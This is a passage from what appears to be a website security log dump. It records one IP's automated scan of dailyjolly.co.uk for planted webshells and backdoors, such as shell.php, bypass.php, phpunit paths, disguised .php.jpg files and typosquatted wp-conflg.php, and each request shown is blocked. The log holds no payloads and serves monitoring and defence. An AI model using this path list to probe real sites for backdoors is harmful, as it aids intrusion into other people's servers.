/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/membernew.php\"}','ujLh2qcvESGkQbpxVMWw8eg6',0,1674369879.4298,202,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/ms-add-pro-photo.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/ms-add-pro-photo.php\"}','UuYQKHFGmPTzr6wJd4ntZbq0',0,1674369879.7813,172,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/newa.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/newa.php\"}','UkWqEwxmJSCaKBcV1NF4AjoD',0,1674369880.1093,211,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/phpimage.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/phpimage.php\"}','Ifw6Ye7WZJ24n5iugxh8ROCk',0,1674369880.4718,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/pluginfotos.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/pluginfotos.php\"}','vYw7tonqQMkchspgr81XidxE',0,1674369880.7952,209,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/productos_img_edit.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/productos_img_edit.php\"}','ZeFv9guNcDSR1CxKrQw76bzi',0,1674369881.1619,210,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/reg_form.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/reg_form.php\"}','2VEtUlJZHIWLzh0wYKd7g6BS',0,1674369881.5437,184,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/sagafif.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/sagafif.php\"}','icMoYVvNPp7nWx3LgfhZDXK1',0,1674369881.8946,206,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/sendme.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/sendme.php\"}','3ri4ygO9fUvmaK1GYLoT6lkt',0,1674369882.2792,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/sfm.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/sfm.php\"}','e0pl2hxnSbc31Q5kYwBV6ZUm',0,1674369882.6052,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/test_upload.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/test_upload.php\"}','oXYNDbC2Ge83qmAVjvSLuEcn',0,1674369882.9203,226,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/unzip.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/unzip.php\"}','b69Olx5X3IMseHRUVLkJ8QCh',0,1674369883.3112,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/up.pdf.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/up.pdf.php\"}','Rrj4gVUNbeMKaZz30Oc9hXv7',0,1674369883.6245,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/upload_submition.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/upload_submition.php\"}','mYIclvyDjL967iEHZSAn4oKT',0,1674369883.9516,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/uu_file_upload.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/uu_file_upload.php\"}','3uEXAPdtsz9mqaCWlV5ZMYcI',0,1674369884.2812,213,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/add-actualites.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/add-actualites.php\"}','O0EIfuBD9szka3UYKATrcGgW',0,1674369884.6690,670,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/alumini/9227_a.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/alumini\\/9227_a.php\"}','7RqzeFmsJZGEoS5PWv6fQDaI',0,1674369885.5613,193,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/headers/readme.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/headers\\/readme.php\"}','t9ZQRCYpnMrKws6h3IlDTeuN',0,1674369885.9422,192,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/images.phtml','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/images.phtml\"}','xKiOTyFs0zZj6wW74npDC3he',0,1674369886.2958,183,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload/addProduct.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload\\/\\/addProduct.php\"}','lLu7NYZsX1UkHoh8BC0K9pVA',0,1674369886.6369,207,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload/dir.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload\\/\\/dir.php\"}','hEy3aqXGk8RTtCIVl7Q5PHpo',0,1674369887.0070,251,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload/fud1.php.jpg','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload\\/\\/fud1.php.jpg\"}','dPepIQvm2VhuMbUa0nlg6OtJ',0,1674369887.4308,206,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload/upload.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload\\/\\/upload.php\"}','WkRiPeYbhl3FcpxHVou1smGS',0,1674369887.8159,321,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload/vvvindex.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload\\/\\/vvvindex.php\"}','SnUl9jI2ZaimHxJePWQCshv7',0,1674369888.3340,505,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload/file/zup.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload\\/file\\/zup.php\"}','EWYbt6zavMp7P1GdsAlKwoXx',0,1674369889.0316,211,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload/petit/fm.php.gif','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload\\/petit\\/fm.php.gif\"}','MxoQgHjOE0KGpiLdR87bfJeS',0,1674369889.4351,203,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload/project/prv.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload\\/project\\/prv.php\"}','FKRGaNBOrioEMkpcmdgw5Ynt',0,1674369889.8263,591,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/as.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/vendor\\/phpunit\\/phpunit\\/src\\/Util\\/PHP\\/as.php\"}','JqjyM01zvcAi3f96ua7nsgGH',0,1674369890.6263,232,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/shell.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/vendor\\/phpunit\\/phpunit\\/src\\/Util\\/PHP\\/shell.php\"}','q7jHTEIPM9NnVSXZOtxeQikA',0,1674369891.0524,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/z7.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/vendor\\/phpunit\\/phpunit\\/src\\/Util\\/PHP\\/z7.php\"}','YyTX74dtsRWIOeafUn1NqjHb',0,1674369891.4273,183,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-admin/module.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-admin\\/\\/module.php\"}','DYZ3CHFAPbSegyGB75hEOVos',0,1674369891.7822,214,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/a.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/\\/a.php\"}','S6WqJkAB8LEa5P9iso0wCyhI',0,1674369892.1626,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/AronTn.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/\\/AronTn.php\"}','HRwZBm5TunSPJCc6oINqOG4h',0,1674369892.4813,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/core.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/\\/core.php\"}','Rnp3gITLFtQw2HAoEDkf6Vji',0,1674369892.7940,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/languages/admin-network-ru_RU.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/languages\\/admin-network-ru_RU.php\"}','nv4VlLoYteiIRHX20ZW7ESQT',0,1674369893.1187,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/clientprofile/mediagallery.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/clientprofile\\/mediagallery.php\"}','N5zJU1epHQKWZiOdDV6kaIjv',0,1674369893.4492,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/db-toolkit/dbtoolkit_import.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/db-toolkit\\/dbtoolkit_import.php\"}','ywQtPGxUWlC3f5kZVJuq7TDn',0,1674369893.7745,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/errynclkzk/dadwehyzpf.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/errynclkzk\\/dadwehyzpf.php\"}','juawLGWpQOfoMJFths9l3CDb',0,1674369894.1012,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/hello-dolly/install.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/hello-dolly\\/install.php\"}','Ib16JfuiHOWVxnMp9k38aScd',0,1674369894.4230,188,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/wp-symetrio/schedule-symetrio.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/wp-symetrio\\/schedule-symetrio.php\"}','vF48c5tQJAmxkiMBO1uKHY2d',0,1674369894.7592,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/themes/intigo-child/ptm-import.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/themes\\/intigo-child\\/ptm-import.php\"}','r4Jc8qawU5ZEzWMk6m7RQANl',0,1674369895.0721,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/wp-content/uploads/mc4wp-debug-log.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/\\/wp-content\\/uploads\\/mc4wp-debug-log.php\"}','mnvSQ8Xfz5TsipI3q2OYxCK7',0,1674369895.4025,211,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/2012/str_pad.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/2012\\/str_pad.php\"}','cbW6kOvXGm3DfzVLjstr4xwN',0,1674369895.7686,181,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/2016/wp-signup.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/2016\\/wp-signup.php\"}','0Gq8NPvtzm6ipYjO59onrKU4',0,1674369896.1055,211,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/2018/wp-conflg.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/2018\\/wp-conflg.php\"}','FymRDphXLq9BIUx7ivQNVfz3',0,1674369896.4834,190,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/2021/wp-signup.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/2021\\/wp-signup.php\"}','fQNlaORm7bxk0jgLe2ASWnD3',0,1674369896.8233,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/2022/1wiki.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/2022\\/1wiki.php\"}','9khltfryu3xTEm6YOp1djgob',0,1674369897.1418,202,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/2022/checkbox.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/2022\\/checkbox.php\"}','bYfojeTNs5iCIvLQBr0Otd2c',0,1674369897.5190,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/2022/data-user.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/2022\\/data-user.php\"}','5FPg87BNhrfpjYo2K9RutIAH',0,1674369897.8461,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/2022/wp-conflg.php.suspected','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/2022\\/wp-conflg.php.suspected\"}','c4lir8zh7MEk3FSwmpBOXLVG',0,1674369898.1734,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/3ponu.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/3ponu.php\"}','S0EAcMnmfzJT7BVyChI6otFU',0,1674369898.5034,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/404.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/404.php\"}','3YFb4feUG0gmE1NkQpirAcRK',0,1674369899.0489,209,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/archieving.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/archieving.php\"}','3ugbyRG2DztsxZA1ir4CwHPF',0,1674369899.4270,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/assignments/update.php.docx','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/assignments\\/update.php.docx\"}','3rekm7fSdcDsWXRhJO6wEzqj',0,1674369899.7463,192,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/batm.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/batm.php\"}','DfwCjKbsHYGJ4Ud3Z6gAVSeI',0,1674369900.1077,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/bg_info.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/bg_info.php\"}','W2B1gavJn7DNcQMptLePm5yT',0,1674369900.4283,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/bulk.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/bulk.php\"}','7quihBQ3RerbZFmMzCNY0sc8',0,1674369900.7553,163,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/bypass.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/bypass.php\"}','oTO7h9XZInAxzilk83BUc2KL',0,1674369901.0693,200,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/dokumenty/about.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/dokumenty\\/about.php\"}','mlhJyPkxW0CIpEYgN5w36OSo',0,1674369902.0281,189,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/external_feed.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/external_feed.php\"}','SOcGekt2WxbC5lI6JjUQDYTw',0,1674369902.3766,180,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/help.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/help.php\"}','GtQifmuVqLBY3WOUZ2k6Jz5H',0,1674369902.7221,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/ipc9z9.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/ipc9z9.php\"}','T6U4MjHCd5rYfan3W1ctBvbw',0,1674369903.0543,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/js.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/js.php\"}','4ayNASeRFuE5UVBDnOk1cChX',0,1674369903.3843,192,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/krop.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/krop.php\"}','qivnNkgFxL93PGXdyfZmr0a6',0,1674369903.7277,162,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/l.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/l.php\"}','UWg1X9ANwqu0ZOveKVxjfps5',0,1674369904.0405,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/mail.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/mail.php\"}','0wUrCZJEs8kyAnumWtdgGxBb',0,1674369904.3614,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/mindex2.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/mindex2.php\"}','82vgROXsr3MbI5kcS9AQqWBt',0,1674369904.6850,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/old.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/old.php\"}','I7Myc4xXozjGFdNUSafpsLDK',0,1674369905.0309,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/shwso.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/shwso.php\"}','LvNoE230FcTpGtdgkJiCIxAa',0,1674369905.3615,186,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/uigen_2016/gaxa1.php.jpg','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/uigen_2016\\/gaxa1.php.jpg\"}','BcnyQ8ao5xG1z6SZf9VjUY7P',0,1674369905.7075,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/up.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/up.php\"}','hr7msPfnC2D9y1FVTj3vIWou',0,1674369906.0442,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/wp-logout.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/wp-logout.php\"}','ZcgRopkTjJnuma3NEG8hQ5zl',0,1674369906.3677,186,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/wp-xmlrpc.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/wp-xmlrpc.php\"}','fS4XI1wgCkBKJFMlROzcn5q2',0,1674369906.7234,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/0aa.php.suspected','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/0aa.php.suspected\"}','aTD9dVn0bXfIHxi7Ys4t5pko',0,1674369907.0713,184,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/24.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/24.php\"}','7OhSpQ8Nj0CV5uKncevAYoyq',0,1674369907.4251,187,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/414lfv.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/414lfv.php\"}','1uweEJiAybntkj0UCZBOfGgM',0,1674369907.7715,191,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/a57bze8931.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/a57bze8931.php\"}','pWVL1BnMfyKSwEUzPkD0YFGa',0,1674369908.1325,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/all.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/all.php\"}','t5MsOUmD67q2SIAipZJj9TzL',0,1674369908.4502,199,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/array_reduce.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/array_reduce.php\"}','fdtVj7UDeFRnGCImuzpyPMi2',0,1674369908.8198,186,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/back.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/back.php\"}','PAmB81g7r3HOdkXJoicSK9hY',0,1674369909.1612,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/block-line.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/block-line.php\"}','HAz5iD9rbngqZXWSE7MKOGam',0,1674369909.5034,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/cache-core.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/cache-core.php\"}','R5xNkeaZVKGz0TO2IfE34SP7',0,1674369909.8327,254,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/category-template-core.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/category-template-core.